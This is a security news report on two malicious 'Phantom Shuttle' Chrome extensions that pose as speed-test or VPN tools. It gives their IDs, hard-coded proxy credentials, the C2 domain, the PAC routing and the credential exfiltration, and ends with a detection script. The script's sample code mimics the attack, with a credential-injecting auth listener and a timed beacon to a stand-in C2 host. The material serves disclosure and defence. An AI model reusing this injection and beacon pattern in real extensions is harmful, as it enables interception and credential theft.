Researchers at Socket have identified two malicious Google Chrome extensions that pose as a multi-location network speed test plug-in but intercept traffic and capture user credentials.
The add-ons are published under the same name, Phantom Shuttle, and were offered as paid services with subscription fees. Both variants were available for download as of writing: ID fbfldogmkadejddihifklefknmikncaj (about 2,000 users, published Nov. 26, 2017) and ID ocpcmfmiidofonkbodpdhgddhlcmcofd (about 180 users, published Apr. 27, 2023). Socket security researcher Kush Pandya said users paid subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD) believing they were buying a legitimate VPN service, while the extensions performed identical malicious operations.
The extensions bundle modified versions of two JavaScript libraries, jquery-1.12.2.min.js and scripts.js, that automatically inject hard-coded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge by registering a listener on chrome.webRequest.onAuthRequired. Socket said the code uses asyncBlocking to respond to authentication challenges before the browser displays a credential prompt, enabling transparent credential injection while still performing real latency tests to reinforce the façade.
After proxy authentication, the extensions configure Chrome's proxy settings with a Proxy Auto-Configuration (PAC) script that implements three modes: close, always and smarty. PAC scripts themselves are a standard, documented proxy-configuration mechanism (see Chrome's PAC guide); the abuse lies in where the script sends traffic. In smarty mode the extensions route a hard-coded list of more than 170 high-value domains through attacker-controlled proxies, including developer platforms, cloud services, enterprise solutions, social media and adult sites; Socket noted the inclusion of pornographic sites may be an attempt to facilitate blackmail.
Socket reported that the extensions maintain a 60-second heartbeat to a command-and-control server at phantomshuttle.space and, every five minutes, exfiltrate a paying (VIP) user's email address and plaintext password, together with version information, via an HTTP GET request. The combination of continuous heartbeat exfiltration and proxy man-in-the-middle capability, Socket said, allows real-time traffic capture, response manipulation and arbitrary payload injection, putting credentials, cookies, form data, API keys and other sensitive material at risk.
The operators behind the campaign are unknown; Socket noted that indicators such as Chinese-language descriptions, Alipay/WeChat Pay integration and use of Alibaba Cloud for hosting point to a China-based operation, but said attribution is not confirmed. Users who have installed the extensions are advised to remove them, and security teams are urged to deploy extension allowlisting, monitor for extensions that combine subscription payments with proxy permissions, and implement network monitoring for suspicious proxy authentication attempts.
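As an added illustration of the triage Socket's advice calls for (this is example code, not Socket's tooling or the extensions' own code), the following Node script scores an unpacked extension for the combination described above: proxy plus webRequest permissions, an onAuthRequired listener registered with blocking/asyncBlocking, hard-coded authCredentials, a PAC script pushed via chrome.proxy.settings and a periodic beacon to a fixed host. The function name, weights, thresholds and the embedded sample manifest/script are constructed for this example.

```javascript
// Added example (not from the original report): static triage of an unpacked
// Chrome extension for the credential-injecting proxy pattern described above.
// All names, weights and sample inputs here are constructed for illustration.

const PROXY_PERMS = ["proxy", "webRequest", "webRequestBlocking", "webRequestAuthProvider"];

const CHECKS = [
  // Listener that answers HTTP auth challenges before the user sees a prompt
  { id: "auth-listener", re: /onAuthRequired\.addListener/, weight: 3 },
  // "blocking" / "asyncBlocking" extraInfoSpec lets the handler supply credentials
  { id: "blocking-auth", re: /\[\s*["'](async)?[bB]locking["']\s*\]/, weight: 2 },
  // Credentials hard-coded in the handler's response
  { id: "literal-creds", re: /authCredentials\s*:\s*\{[^}]*password\s*:\s*["'][^"']+["']/, weight: 4 },
  // PAC script installed through chrome.proxy.settings
  { id: "pac-script", re: /proxy\.settings\.set\([\s\S]*?pacScript/, weight: 2 },
  // Timer-driven request to a hard-coded remote host (heartbeat / exfiltration)
  { id: "beacon", re: /setInterval\([\s\S]*?https?:\/\/[^"'\s)]+/, weight: 1 },
];

// manifest: parsed manifest.json; scripts: { filename: source text }
function triageExtension(manifest, scripts) {
  const perms = new Set([...(manifest.permissions || []), ...(manifest.host_permissions || [])]);
  const findings = [];
  let score = 0;
  const proxyPerms = PROXY_PERMS.filter((p) => perms.has(p));
  if (proxyPerms.includes("proxy") && proxyPerms.some((p) => p.startsWith("webRequest"))) {
    findings.push("perms:" + proxyPerms.join("+"));
    score += 2;
  }
  for (const [name, src] of Object.entries(scripts)) {
    for (const c of CHECKS) {
      if (c.re.test(src)) { findings.push(`${name}:${c.id}`); score += c.weight; }
    }
  }
  const verdict = score >= 8 ? "review-now" : score >= 4 ? "suspicious" : "low";
  return { score, findings, verdict };
}

// Constructed sample mimicking the reported behaviour (credentials are placeholders).
const SAMPLE_MANIFEST = { manifest_version: 2, permissions: ["proxy", "webRequest", "webRequestBlocking", "<all_urls>"] };
const SAMPLE_SCRIPTS = {
  "scripts.js": `
chrome.webRequest.onAuthRequired.addListener(function (details, callback) {
  callback({ authCredentials: { username: "user", password: "PLACEHOLDER" } });
}, { urls: ["<all_urls>"] }, ["asyncBlocking"]);
chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: pac } }, scope: "regular" });
setInterval(() => fetch("http://c2.example/heartbeat"), 60000);`,
};

console.log(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS)); // verdict: "review-now"
```

In practice you would read manifest.json and every script listed under background/content_scripts from the unpacked extension directory and pass them in; a "review-now" verdict is a prompt for manual review, not proof of malice.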